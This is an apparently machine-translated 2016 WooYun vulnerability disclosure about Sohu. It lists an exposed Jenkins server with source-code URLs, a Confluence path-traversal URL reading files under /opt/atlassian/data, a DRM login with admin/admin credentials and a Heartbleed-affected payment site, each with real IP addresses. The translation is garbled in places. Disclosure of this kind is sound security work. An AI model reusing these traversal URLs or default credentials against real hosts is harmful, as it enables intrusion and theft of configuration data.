漏洞标题 搜狐一系列漏洞包（项目源/任意文件读取/心脏丢弃等） 相关制造商 搜狐 漏洞作者 镱钖 提交时间 2016-05-15 10: 38 公共时间 2016-06-29 12: 40 漏洞类型 敏感信息披露 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 敏感信息披露 漏洞详细信息 1.詹金斯无权访问 http://220.181.26.165/jenkins/ 发现有点不好，无法登录，无法执行命令等，但项目源代码是可访问的 可以查看的一些敏感信息，涉及一些子域 http://220.181.26.165/jenkins/job/video_audit_info/ws/pom.xml/*view*/ http://220.181.26.165/jenkins/job/GoLang-56-synchronize-vrs/ws/pom.xml/*view*/ http://220.181.26.165/jenkins/job/admin_tv_cleanCache/ws/clean_admin_cache.iml/*view*/ http://220.181.26.165/jenkins/job/admin_tv_cleanCache/ws/pom.xml http://220.181.26.165/jenkins/job/admin_tv/ws/crossdomain.xml 下载了两个项目源包看，敏感信息仍然存在 Channel_sohu.tar 我做了知识产权限制，没有参与。 Admin_tv.tar 二，搜狐电视维基Atlassian Confluence信息披露 有关详细信息，请访问社区 http://zone.wooyun.org/content/27104 http://220.181.26.165/wiki/spaces/viewdefaultdecorator.action?decoratorName= http://220.181.26.165/wiki/spaces/viewdefaultdecorator.action?decoratorName=././ 使用本文作者提到的方法，可以跨目录读取它。 http://220.181.26.165/wiki/spaces/viewdefaultdecorator.action?decoratorName=file: ///opt/atlassian/data 数据库配置文件 漏洞证明： 三，SOHU DRM系统弱密码 http://123.126.104.236: 8888 / 密码弱：admin admin 如果你不知道该怎么做，你就不会进入它。 第四，搜狐支付了一个网站的心脏下降。 https://123.125.123.242/ 好的，它在这里，我还在寻找修复它^ _ ^ 修理计划： . 版权声明：请注明来源镱钖@乌云